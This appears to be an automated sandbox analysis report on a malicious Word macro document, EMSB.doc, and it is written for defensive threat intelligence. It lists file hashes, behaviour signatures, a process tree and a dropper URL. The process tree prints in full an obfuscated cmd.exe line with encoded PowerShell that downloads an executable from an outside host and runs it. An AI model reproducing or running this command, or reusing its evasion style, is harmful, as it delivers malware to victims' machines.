Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-05-2024 17:45

General

  • Target

    EMSB.doc

  • Size

    114KB

  • MD5

    754dc2d09d30c6e9d51a08feb7396dcc

  • SHA1

    f17f2e77515157a1f07338571ffc55db8a2d1573

  • SHA256

    1df932207319ad8505a88a915c3bbf5eb11fd12dba6d921cd107ef497da25692

  • SHA512

    a69edd08a95888287841461ee19508b5e03063052240911f1ebd4cb74f23bb3e40b6f980edce5e1d476498c4cfcc61b091f6173b20785aec916b54e59c6ec8fd

  • SSDEEP

    1536:/9F+u6qHEmcutqTRE23B9bEfAl/eDW3+jYrqCEtvaaeeAbgy1oZUeB6:/+u6Ict73PbE4xrLKngUUeU

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://kotobelamx.com/DAB/nerimf.php?l=willow2.pas

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\EMSB.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2932
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c p^O^w^e^R^s^H^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^r^A^G^8^A^d^A^B^v^A^G^I^A^Z^Q^B^s^A^G^E^A^b^Q^B^4^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^E^A^E^E^A^Q^g^A^v^A^G^4^A^Z^Q^B^y^A^G^k^A^b^Q^B^m^A^C^4^A^c^A^B^o^A^H^A^A^P^w^B^s^A^D^0^A^d^w^B^p^A^G^w^A^b^A^B^v^A^H^c^A^M^g^A^u^A^H^A^A^Y^Q^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^x^A^D^I^A^M^Q^A^0^A^D^M^A^M^Q^A^z^A^D^Q^A^M^w^A^2^A^D^I^A^M^A^A^3^A^D^Q^A^M^Q^A^u^A^G^U^A^e^A^B^l^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^p^A^D^s^A^I^A^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^E^A^M^g^A^x^A^D^Q^A^M^w^A^x^A^D^M^A^N^A^A^z^A^D^Y^A^M^g^A^w^A^D^c^A^N^A^A^x^A^C^4^A^Z^Q^B^4^A^G^U^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^D^s^A^I^A^B^F^A^H^g^A^a^Q^B^0^A^D^s^A
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:1632
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          pOweRsHeLL.exe -EC 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
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:572

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      4b697633ffdf60590f6ac6e0e4c556a8

      SHA1

      76e41442551b7f9407d11ac0eead5801f27d1ebe

      SHA256

      1cbb035b982018e1fa004360bf928477d0c5ad94a23e7ea1156735d68c4116ef

      SHA512

      cfe10b6bf63ebefb21101a53d53ef848bfc6abeb55c2d79120980886c7d95310be284f909c020af1015f151acff7fe2aafbaa9ce7335a4dab456387d5e5ab589

    • memory/2036-0-0x000000002F321000-0x000000002F322000-memory.dmp

      Filesize

      4KB

    • memory/2036-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2036-2-0x00000000713FD000-0x0000000071408000-memory.dmp

      Filesize

      44KB

    • memory/2036-11-0x00000000713FD000-0x0000000071408000-memory.dmp

      Filesize

      44KB

    • memory/2036-19-0x00000000054C0000-0x00000000055C0000-memory.dmp

      Filesize

      1024KB

    • memory/2036-18-0x00000000054C0000-0x00000000055C0000-memory.dmp

      Filesize

      1024KB

    • memory/2036-36-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2036-37-0x00000000713FD000-0x0000000071408000-memory.dmp

      Filesize

      44KB